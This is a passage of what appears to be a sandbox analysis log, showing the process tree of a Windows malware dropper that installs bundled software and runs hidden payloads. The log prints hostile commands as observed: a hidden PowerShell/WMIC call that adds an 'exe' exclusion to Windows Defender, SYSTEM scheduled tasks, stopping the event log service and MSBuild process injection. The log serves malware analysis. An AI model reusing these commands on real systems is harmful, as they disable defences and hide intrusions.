C:\Users\Admin\AppData\Local\Temp\u6ac.0.exe"C:\Users\Admin\AppData\Local\Temp\u6ac.0.exe"6⤵PID:9108
-
C:\Users\Admin\AppData\Local\Temp\u6ac.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u6ac.2\run.exe"6⤵PID:7192
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe7⤵PID:8392
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe8⤵PID:7420
-
C:\Users\Admin\Documents\SimpleAdobe\BVyBZOqbxjxPQdZQodyXXQvX.exeC:\Users\Admin\Documents\SimpleAdobe\BVyBZOqbxjxPQdZQodyXXQvX.exe5⤵PID:5524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6056
-
C:\Users\Admin\Documents\SimpleAdobe\BVyBZOqbxjxPQdZQodyXXQvX.exe"C:\Users\Admin\Documents\SimpleAdobe\BVyBZOqbxjxPQdZQodyXXQvX.exe"6⤵PID:4816
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:7620
-
C:\Users\Admin\Documents\SimpleAdobe\VdSrhS0IVzkhXtZ8RZwWDgU0.exeC:\Users\Admin\Documents\SimpleAdobe\VdSrhS0IVzkhXtZ8RZwWDgU0.exe5⤵PID:7236
-
C:\Users\Admin\AppData\Local\Temp\7zSF7A7.tmp\Install.exe.\Install.exe6⤵PID:6676
-
C:\Users\Admin\AppData\Local\Temp\7zSFA56.tmp\Install.exe.\Install.exe /odidPC "525403" /S7⤵PID:5016
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵PID:828
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:9156
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:6928
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵PID:5292
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 10:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\pyNUeVh.exe\" ZO /ATsite_idqwT 525403 /S" /V1 /F8⤵
- Creates scheduled task(s)
PID:756 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bwrroZoeZRoQVpyAcj"8⤵PID:2948
-
C:\Users\Admin\Documents\SimpleAdobe\p8bzfW480Jt3HNsoyRaSMJy6.exeC:\Users\Admin\Documents\SimpleAdobe\p8bzfW480Jt3HNsoyRaSMJy6.exe5⤵PID:5412
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵PID:7080
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵PID:6712
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵PID:6900
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵PID:8512
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:8856 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"6⤵
- Launches sc.exe
PID:5528 -
C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe"C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe" --silent --allusers=04⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:6776 -
C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exeC:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2a0,0x2a4,0x2a8,0x27c,0x2ac,0x6af4e1d0,0x6af4e1dc,0x6af4e1e85⤵
- Loads dropped DLL
PID:8120 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\7MIpvZeCZgl5ZPeAuQtK9vkn.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\7MIpvZeCZgl5ZPeAuQtK9vkn.exe" --version5⤵
- Loads dropped DLL
PID:7232 -
C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe"C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=6776 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240425104533" --session-guid=7ba34c3b-e010-40b8-a47f-2e91ffa1e9f0 --server-tracking-blob="N2UxZGIzN2U1ZDVlZTgwNWQ1ZDM0MGM1ZjMxN2YyYTE1NjQzOWE4Y2IyODFjZjU0M2Q0ZDliOWI4ZTRhMTY1Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDQxOTE3LjQ3NjUiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNDQ2MWZmMDMtNGUzNi00ZjllLWFiZTMtY2FmZmE4Yjg5OGYzIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=4C040000000000005⤵
- Loads dropped DLL
- Enumerates connected drives
PID:8060 -
C:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exeC:\Users\Admin\Pictures\7MIpvZeCZgl5ZPeAuQtK9vkn.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2b0,0x2b4,0x2b8,0x280,0x2bc,0x666fe1d0,0x666fe1dc,0x666fe1e86⤵
- Loads dropped DLL
PID:8024 -
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer.exe" --backend --initial-pid=6776 --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --server-tracking-data=server_tracking_data --show-intro-overlay --package-dir="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331" --session-guid=7ba34c3b-e010-40b8-a47f-2e91ffa1e9f0 --server-tracking-blob="N2UxZGIzN2U1ZDVlZTgwNWQ1ZDM0MGM1ZjMxN2YyYTE1NjQzOWE4Y2IyODFjZjU0M2Q0ZDliOWI4ZTRhMTY1Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzE0MDQxOTE3LjQ3NjUiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiNDQ2MWZmMDMtNGUzNi00ZjllLWFiZTMtY2FmZmE4Yjg5OGYzIn0= " --silent --desktopshortcut=1 --install-subfolder=109.0.5097.596⤵PID:9068
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x27c,0x280,0x284,0x230,0x288,0x7ffa3f4c7c80,0x7ffa3f4c7c8c,0x7ffa3f4c7c987⤵PID:6372
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer_helper_64.exe"C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\installer_helper_64.exe" 1 "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\Opera Browser.lnk"7⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe" --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera\assistant" --copyonly=0 --allusers=07⤵PID:1140
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x9d6038,0x9d6044,0x9d60508⤵PID:8848
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --ran-launcher --install-extension="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\be76331b95dfc399cd776d2fc68021e0db03cc4f.crx"7⤵PID:5448
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06708⤵PID:5768
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1836,i,5723578420383743362,1383145268307353878,262144 --variations-seed-version --mojo-platform-channel-handle=1832 /prefetch:28⤵PID:5288
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=1732,i,5723578420383743362,1383145268307353878,262144 --variations-seed-version --mojo-platform-channel-handle=1848 /prefetch:38⤵PID:5040
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-opening-animation=off --with-feature:startpage-sync-banner=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=2140,i,5723578420383743362,1383145268307353878,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:88⤵PID:1960
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized7⤵PID:60
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.59\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffa3c2c0650,0x7ffa3c2c0660,0x7ffa3c2c06708⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"5⤵PID:3028
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe" --version5⤵
- Loads dropped DLL
PID:4412 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404251045331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x244,0x248,0x24c,0x220,0xac,0x426038,0x426044,0x4260506⤵
- Loads dropped DLL
PID:1408 -
C:\Users\Admin\Pictures\45sSxbxCE8g7qu6YUVE93R8Z.exe"C:\Users\Admin\Pictures\45sSxbxCE8g7qu6YUVE93R8Z.exe"4⤵PID:8960
-
C:\Users\Admin\AppData\Local\Temp\7zS2BB9.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S5⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:3804 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:3492
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:7840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:7760
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:6320
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\QlVsVPc.exe\" em /ghsite_idlGh 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:8464 -
C:\Users\Admin\Pictures\JYO5dgUzcRE5wPXLOxEGpMik.exe"C:\Users\Admin\Pictures\JYO5dgUzcRE5wPXLOxEGpMik.exe"4⤵PID:7804
-
C:\Users\Admin\AppData\Local\Temp\u60s.0.exe"C:\Users\Admin\AppData\Local\Temp\u60s.0.exe"5⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\u60s.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u60s.2\run.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5600 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\u60s.3.exe"C:\Users\Admin\AppData\Local\Temp\u60s.3.exe"5⤵
- Checks SCSI registry key(s)
PID:5228 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
PID:5800 -
C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe"C:\Program Files\iolo technologies\System Mechanic\WPF_Driver\release\win32\nfregdrv.exe" pgfilter7⤵
- Loads dropped DLL
PID:7588 -
C:\Program Files\iolo technologies\System Mechanic\incinerator.exe"C:\Program Files\iolo technologies\System Mechanic\incinerator.exe" /regserver7⤵
- Loads dropped DLL
- Registers COM server for autorun
- Checks SCSI registry key(s)
- Modifies registry class
PID:8544 -
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name=ioloTrayApp dir=in action=allow program="C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:8932 -
C:\Program Files\iolo technologies\System Mechanic\iolo.exe"C:\Program Files\iolo technologies\System Mechanic\iolo.exe"7⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
PID:7424 -
C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"8⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6344 -
C:\Program Files\iolo technologies\System Mechanic\activebridge.exe"C:\Program Files\iolo technologies\System Mechanic\activebridge.exe" -events_triggered 9003 -override24Hour true9⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:7064 -
C:\Windows\SYSTEM32\regsvr32.exe"regsvr32" "C:\Program Files\iolo technologies\System Mechanic\Incinerator.dll" /s8⤵
- Loads dropped DLL
- Modifies system executable filetype association
- Registers COM server for autorun
- Modifies registry class
PID:6944 -
C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"C:\Program Files\iolo technologies\System Mechanic\ioloTrayApp.exe"8⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:3172 -
C:\Users\Admin\Pictures\q0SJhh1BDxoYxBBlQAP6orRh.exe"C:\Users\Admin\Pictures\q0SJhh1BDxoYxBBlQAP6orRh.exe"4⤵PID:6048
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:7100
-
C:\Users\Admin\Pictures\q0SJhh1BDxoYxBBlQAP6orRh.exe"C:\Users\Admin\Pictures\q0SJhh1BDxoYxBBlQAP6orRh.exe"5⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:6436 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6760 -
C:\Users\Admin\Pictures\l5KWUH4RxMkj5MD26qD7ur2C.exe"C:\Users\Admin\Pictures\l5KWUH4RxMkj5MD26qD7ur2C.exe"4⤵PID:8144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:5648
-
C:\Users\Admin\Pictures\l5KWUH4RxMkj5MD26qD7ur2C.exe"C:\Users\Admin\Pictures\l5KWUH4RxMkj5MD26qD7ur2C.exe"5⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:6596 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7392 -
C:\Users\Admin\Pictures\BmGFwn4X2slFd0x3BwDVZ8IA.exe"C:\Users\Admin\Pictures\BmGFwn4X2slFd0x3BwDVZ8IA.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8920 -
C:\Users\Admin\Pictures\poH7LiwSXsBgm1pfVmOtFOU9.exe"C:\Users\Admin\Pictures\poH7LiwSXsBgm1pfVmOtFOU9.exe" --silent --allusers=04⤵
- Loads dropped DLL
- Enumerates connected drives
PID:4992 -
C:\Users\Admin\Pictures\poH7LiwSXsBgm1pfVmOtFOU9.exeC:\Users\Admin\Pictures\poH7LiwSXsBgm1pfVmOtFOU9.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.59 --initial-client-data=0x2ac,0x2b0,0x2b4,0x28c,0x2b8,0x6dcde1d0,0x6dcde1dc,0x6dcde1e85⤵
- Loads dropped DLL
PID:7336 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\poH7LiwSXsBgm1pfVmOtFOU9.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\poH7LiwSXsBgm1pfVmOtFOU9.exe" --version5⤵
- Loads dropped DLL
PID:8028 -
